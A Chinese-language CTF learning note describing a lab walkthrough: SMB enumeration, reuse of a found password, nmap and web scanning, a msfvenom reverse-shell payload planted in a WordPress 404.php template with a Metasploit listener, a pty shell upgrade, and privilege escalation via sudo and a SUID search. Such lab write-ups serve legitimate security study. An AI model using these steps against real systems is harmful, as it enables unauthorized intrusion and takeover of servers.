我的CTF学习与教学之旅笔记3

3.SMB

查看:smbclinet -L IP

连接:smbclient '\\IP\路径'

smb>ls

smb>help

get 下载指定文件分析

deets.txt:里面有个12345密码,留着!!!

重点关注应用的配置文件:如wp_config.php

可能会发现mysql的用户名和密码

远程登录mysql试试:

mysql -h ip地址 -u Admin -p

不让远程登录,不行!!!!!

再试ssh服务是否可用:

ssh Admin@IP地址

用发现的密码登录试试,也不行!

但是,都要试试!!!!!!!


nmap -A -T4

接下来用searchsploit  服务版本信息

也没有有用的信息


利用dirb 、nikto探测网站

发现wp-admin:哇哈哈哈

#利用网站uplods的漏洞,上传反射文件,并在攻击机开始监听

上传点:

msfvenom -p 载荷 相关设置 -f 文件类型 >反射目标文件

攻击机使用exploit/multi/handler

设置载荷、配置主机、端口

并启动主机监听

随后:

利用wordpress漏洞:利用前面找到的mysql密码,登录WordPress后台

 

技巧:

优化终端:python -c "import pty;pty.spawn('/bin/bash')"

在appearence下修改404.php,内容为新建的反射文件内容

浏览该404.php文件,启动反射

提权:

利用su - root 提权

sudo -l 查看可以使用哪些命令

sudo 执行相关命令

sudo su 提升到root权限

find / -perm -4000 2>/dev/null   查看有root执行权限的命令

你可能感兴趣的:(web安全)